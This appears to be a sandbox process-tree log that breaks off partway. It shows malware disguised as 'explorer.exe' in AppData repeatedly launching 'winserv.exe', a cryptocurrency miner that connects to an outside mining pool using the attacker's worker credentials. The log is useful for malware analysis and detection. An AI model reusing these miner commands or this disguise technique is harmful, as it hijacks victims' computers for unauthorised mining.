C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2668
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1384
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4424
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2828
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:3620
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2748
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4452
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4008
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2236
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4004
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:872
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2884
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4696
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4168
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3712
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:812
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1288
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3940
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5028
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4912
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2348
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3536
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4460
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2644
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5008
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1412
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:5044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3440
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3524
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2364
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4776
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3956
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3888
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4020
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:100
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3192
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3932
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2176
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1568
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4204
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:628
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2672
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1804
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:748
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2360
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1800
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:5032
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3748
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2944
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1392
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2644
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3668
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2596
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3984
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2024
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2204
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2020
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4404
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3376
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4004
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4228
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:912
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:1572
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3932
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3772
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3628
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4904
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3424
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3416
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4764
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:760
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2508
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3748
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4208
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2484
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3660
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2260
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3128
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4124
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3328
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2888
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3156
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3708
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4680
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2500
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4860
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:100
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4400
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2520
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:116
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2176
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4688
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2916
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2652
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:4164
-
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2248
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1968
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:540
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1616
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3184
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2264
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4208
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3844
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2200
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3888
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3256
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2596
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:116
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4260
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:968
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3828
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3932
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:3476
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4348
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4448
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4400
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4880
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1468
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2096
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2956
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:440
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2576
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2860
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:3440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4304
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5112
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:1648
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4844
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4004
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:2928
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:5004
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3540
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:1452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4624
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:3568
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4112
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1720
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4088
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:2264
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:2348
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2132
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:4356
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:2792
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:4848
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe3⤵PID:4364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe1⤵PID:1640
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe2⤵PID:4960
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas3⤵PID:3464
-
-
